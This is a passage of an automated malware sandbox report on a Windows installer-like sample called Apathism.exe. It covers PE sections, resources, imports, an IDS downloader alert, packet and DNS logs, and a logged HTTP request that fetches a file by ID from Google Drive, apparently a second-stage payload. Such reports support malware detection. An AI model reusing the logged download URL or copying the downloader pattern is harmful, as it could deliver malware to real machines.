                        .ndata | 0x2b000 | 0x35000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc | 0x60000 | 0x1c778 | 0x1c800 | b91e26e6208d37c7e205f7d90ea83a0a | False | 0.25319524396929827 | data | 4.499106927490981 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                        RT_BITMAP | 0x603a0 | 0x368 | Device independent bitmap graphic, 96 x 16 x 4, image size 768 | English | United States | 0.23623853211009174
                        RT_ICON | 0x60708 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 0 | English | United States | 0.0935466698213652
                        RT_ICON | 0x70f30 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 0 | English | United States | 0.21215162966461976
                        RT_ICON | 0x75158 | 0x2f66 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.994890390637877
                        RT_ICON | 0x780c0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.2857883817427386
                        RT_ICON | 0x7a668 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.4294090056285178
                        RT_ICON | 0x7b710 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.624113475177305
                        RT_DIALOG | 0x7bb78 | 0x144 | data | English | United States | 0.5216049382716049
                        RT_DIALOG | 0x7bcc0 | 0x13c | data | English | United States | 0.5506329113924051
                        RT_DIALOG | 0x7be00 | 0x120 | data | English | United States | 0.5104166666666666
                        RT_DIALOG | 0x7bf20 | 0x11c | data | English | United States | 0.6056338028169014
                        RT_DIALOG | 0x7c040 | 0xc4 | data | English | United States | 0.5918367346938775
                        RT_DIALOG | 0x7c108 | 0x60 | data | English | United States | 0.7291666666666666
                        RT_GROUP_ICON | 0x7c168 | 0x5a | data | English | United States | 0.7777777777777778
                        RT_VERSION | 0x7c1c8 | 0x26c | data | English | United States | 0.532258064516129
                        RT_MANIFEST | 0x7c438 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
                        DLL | Import
                        ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                        SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                        ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                        COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
                        USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, SetWindowPos, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                        GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                        KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersion, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, ExitProcess, CopyFileW, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                        Language of compilation system | Country where language is spoken | Map
                        English | United States |
                        Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                        2024-10-22T16:04:30.150097+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 49713 | 142.250.184.238 | 443 | TCP
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Oct 22, 2024 16:04:34.485934019 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.489043951 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.489113092 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.489156008 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.489192963 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.492696047 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.492755890 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.492778063 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.492829084 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.495371103 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.495428085 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.495441914 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.495479107 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.498558998 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.498613119 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.498666048 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.498708010 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.501743078 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.501799107 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.501854897 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.501889944 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.504688978 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.504736900 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.504795074 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.504831076 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.507911921 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.507987976 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.508105993 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.508148909 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.510732889 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.510801077 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.510878086 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.510915041 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.513797045 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.513858080 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.513921976 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.513959885 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.516762018 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.516833067 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.516905069 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.516941071 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.519736052 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.519804001 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.519865990 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.519903898 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.522702932 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.522766113 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.522836924 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.522877932 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.525396109 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.525449991 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.525518894 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.525552988 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.528312922 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.528377056 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.528570890 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.528609037 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.531017065 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.531073093 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.531178951 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.531215906 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.533792973 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.533850908 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.533910990 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.533948898 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.536601067 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.536659956 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.536715984 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.536760092 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.539304972 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.539407969 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.539474964 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.539515018 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.542082071 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.542160034 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.542177916 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.542215109 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.544703960 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.544754982 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.544836044 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.544872046 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.547460079 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.547521114 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.547589064 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.547621012 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.550096989 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.550163984 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.550198078 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.550237894 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.552580118 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.552653074 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.552673101 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.552712917 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.555241108 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.555288076 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.555346012 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.555382013 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.557687044 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.557744980 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.557821989 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.557859898 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.557869911 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.557902098 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.560205936 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.560286045 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.560300112 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.560334921 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.562808037 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.562874079 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.562901974 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.562939882 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.565165043 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.565217972 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.581593037 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.581727028 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.581751108 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.581792116 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.582351923 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.582442045 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.582449913 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.582510948 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.583019018 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.583066940 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.583074093 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.583108902 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.583784103 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.583851099 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.583858013 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.583890915 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.584474087 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.584517956 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.585274935 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.585330009 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.585338116 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.585367918 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.586054087 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.586111069 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.586119890 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.586152077 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.586704969 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.586757898 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.586765051 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.586793900 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.587132931 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.587178946 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.587186098 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.587215900 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.587944031 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.587999105 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.588149071 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.588181973 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.589349031 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.589404106 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.589513063 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.589550972 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.591945887 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.592010021 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.592020988 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.592058897 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.594022989 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.594085932 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.594095945 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.594131947 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.596086979 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.596133947 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.596209049 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.596245050 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.599549055 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.599606991 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.599651098 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.599689960 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.600541115 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.600586891 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.600666046 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.600754976 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.602682114 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.602735996 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.602751970 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.602788925 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.604439974 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.604492903 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.604535103 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.604573011 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.606410980 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.606460094 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.606503010 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.606537104 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.608495951 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.608550072 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.608561993 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.608592987 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.610390902 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.610441923 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.610451937 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.610483885 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.612198114 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.612301111 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.612318993 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.612358093 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.614468098 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.614521027 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.614567995 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.614600897 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.615988970 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.616040945 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.616097927 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.616133928 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.619399071 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.619455099 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.619467020 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.619503975 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.619765043 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.619802952 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.619999886 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.620034933 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.621711016 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.621753931 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.621799946 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.621833086 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.623711109 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.623755932 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.623878002 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.623913050 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.625643015 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.625689030 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.625710011 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.625745058 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.628468990 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.628515959 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.628524065 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.628552914 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.628968000 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.629060030 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.629153013 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.629189014 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.630678892 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.630734921 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.630744934 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.630776882 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.633418083 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.633477926 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.633500099 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.633534908 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.634037971 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.634078026 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.659013033 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.659140110 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.659204960 CEST49715443192.168.2.9142.250.186.97
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Oct 22, 2024 16:04:28.808538914 CEST | 56164 | 53 | 192.168.2.9 | 1.1.1.1
                        Oct 22, 2024 16:04:28.815854073 CEST | 53 | 56164 | 1.1.1.1 | 192.168.2.9
                        Oct 22, 2024 16:04:30.168169022 CEST | 61188 | 53 | 192.168.2.9 | 1.1.1.1
                        Oct 22, 2024 16:04:30.177119017 CEST | 53 | 61188 | 1.1.1.1 | 192.168.2.9
                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                        Oct 22, 2024 16:04:28.808538914 CEST | 192.168.2.9 | 1.1.1.1 | 0x2633 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
                        Oct 22, 2024 16:04:30.168169022 CEST | 192.168.2.9 | 1.1.1.1 | 0x76c7 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                        Oct 22, 2024 16:04:28.815854073 CEST | 1.1.1.1 | 192.168.2.9 | 0x2633 | No error (0) | drive.google.com | | 142.250.184.238 | A (IP address) | IN (0x0001) | false
                        Oct 22, 2024 16:04:30.177119017 CEST | 1.1.1.1 | 192.168.2.9 | 0x76c7 | No error (0) | drive.usercontent.google.com | | 142.250.186.97 | A (IP address) | IN (0x0001) | false
                        • drive.google.com
                        • drive.usercontent.google.com
                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.2.9 | 49713 | 142.250.184.238 | 443 | 4512 | C:\Users\user\AppData\Local\Temp\Apathism.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-10-22 14:04:29 UTC | 216 | OUT | GET /uc?export=download&id=1YmsapsQuJkTPoH8BzP8NzbEbTh6ek1Mh HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                        Host: drive.google.com
                        Cache-Control: no-cache
                        2024-10-22 14:04:30 UTC | 1610 | IN | HTTP/1.1 303 See Other
                        Content-Type: application/binary
                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                        Pragma: no-cache
                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                        Date: Tue, 22 Oct 2024 14:04:29 GMT
                        Location: https://drive.usercontent.google.com/download?id=1YmsapsQuJkTPoH8BzP8NzbEbTh6ek1Mh&export=download
                        Strict-Transport-Security: max-age=31536000
                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
